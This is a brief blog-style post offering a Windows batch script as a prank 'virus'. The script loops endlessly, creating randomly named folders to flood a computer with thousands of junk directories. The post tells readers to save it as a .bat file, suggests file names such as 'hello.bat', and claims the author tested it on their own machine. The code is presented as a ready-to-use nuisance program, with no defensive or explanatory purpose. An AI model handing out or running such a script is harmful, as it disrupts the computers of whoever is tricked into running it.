The following piece of code is going to help flood you computer with junky folders. This
program has the tendency to create more than 3000 folders in just less than a minute.
@echo off
:loop
mkdir %random%
goto loop
Here I have enclosed the screenshot took while I was testing this code on my computer
Just save the above code as virus.bat the .bat is necessary.name it anything but at the end add.bat for example
hello.bat
wassup,bat
super.bat
0 comments:
Post a Comment